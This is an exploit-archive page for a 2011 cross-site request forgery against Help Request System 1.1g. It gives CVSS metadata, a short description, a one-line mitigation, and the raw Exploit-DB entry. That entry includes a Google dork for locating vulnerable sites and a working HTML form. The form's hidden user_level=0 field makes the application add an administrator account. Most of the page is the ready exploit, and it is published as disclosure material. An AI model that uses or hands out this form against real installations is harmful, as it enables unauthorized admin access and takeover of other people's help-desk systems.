Help Request System 1.1g XSRF (add admin)

vendor:

Help Request System

by:

G13

7.5

CVSS

HIGH

Cross-Site Request Forgery (XSRF)

352

CWE

Product Name: Help Request System

Affected Version From: 1.1g

Affected Version To: 1.1g

Patch Exists: NO

Related CWE: N/A

CPE: freehelpdesk.org

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

Help Request System 1.1g XSRF (add admin)

This exploit allows an attacker to add an admin user to the Help Request System 1.1g application by submitting a maliciously crafted form. The form contains fields for the user's name, login name, and password, as well as a hidden field for the user's level. By setting the user's level to 0, the attacker can create an admin user.

Mitigation:

The application should validate all user input and verify that the user is authorized to perform the requested action.

Source

Exploit-DB raw data:

# Exploit Title: Help Request System 1.1g XSRF (add admin)
# Date: 08-23-2011
# Google Dork: "powered by freehelpdesk.org"
# Author: G13
# Software link: http://freehelpdesk.org/
# Version: 1.1g

<html>
<body>
<form id="edit" method="post" 
action="http://localhost/request/index.php?sub=users&action=store&type=add" 
enctype="">
Name: <input class="FormItemTextbox" type="text" name="user_name" 
size="35" maxlength="" value=""><br>
Login name:<input class="FormItemTextbox" type="text" name="user_login" 
size="20" maxlength="" value=""><br>
Pass:<input class="FormItemTextbox" type="password" id="user_password" 
name="user_password" size="20" value=""><br>
Pass confirm:<input class="FormItemTextbox" type="password" 
id="user_password_confirm" name="user_password_confirm" size="20" 
value=""><br>
<input type="hidden" name="user_level" value="0">
<input class="btn" type="submit" value="Submit" id="submit" 
name="submit">
</form>
</body>